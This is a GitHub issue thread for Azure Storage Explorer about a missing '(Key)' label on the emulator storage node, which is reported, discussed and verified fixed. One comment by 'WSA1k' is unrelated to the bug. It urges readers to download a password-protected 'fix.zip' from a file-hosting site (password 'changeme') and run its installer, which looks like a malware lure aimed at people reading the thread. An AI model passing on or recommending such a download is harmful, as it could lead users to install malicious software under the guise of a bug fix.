### ISSUE TITLE
There is no string '(Key)' next to the '(Emulator - Default Ports)' node

### ISSUE THREAD

**Issue by v-kellyluo** [microsoft/AzureStorageExplorer#8149]
**Storage Explorer Version:** 1.35.0-dev (100)
**Build Number:** 20240826.1
**Branch:** main
**Platform/OS:** Windows11/Windows 10/Linux Ubuntu 22.04/MacOS Sonoma 14.6.1(Apple M1 Pro)
**Architecture:** arm64/x64/x64/arm64
**How Found:** From running test cases
**Regression From:** Previous release (1.35.0)

## Steps to Reproduce ##

1. Launch Storage Explorer.
2. Expand 'Emulator & Attached' -> Storage Accounts.
3. Check whether there is a string '(Key)' next to the '(Emulator - Default Ports)' node.

## Expected Experience ##
There is a string '(Key)'.
![image](https://github.com/user-attachments/assets/14b1c2e9-8b91-481d-9aae-16bc685c88c3)

## Actual Experience ##
There is no string '(Key)'.
![image](https://github.com/user-attachments/assets/f8e92734-78f0-4e5c-a375-b305c7875e69)

## Additional Context ##
There is no (Key) or (SAS) for attached storage accounts.
![image](https://github.com/user-attachments/assets/c28e6f18-e924-486e-952a-e8e6b1a1303f)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by craxal** [comment]
@RichardMSFT Was this deliberate? Either way, it's debatable whether the "(Key)" status is useful or even accurate, since not all SAS are key-based.

I think we should make sure "(SAS)" is present for storage accounts though. Both of us have been working in this area. Can you see if this regressed due to my changes and your changes then assign/reassign as appropriate?

**Comment by v-kellyluo** [comment]
Verified this issue on the build 20240829.6. Fixed. So, we are going to close it.
![image](https://github.com/user-attachments/assets/4bc5d54d-50f1-458c-83ab-f71068870606)
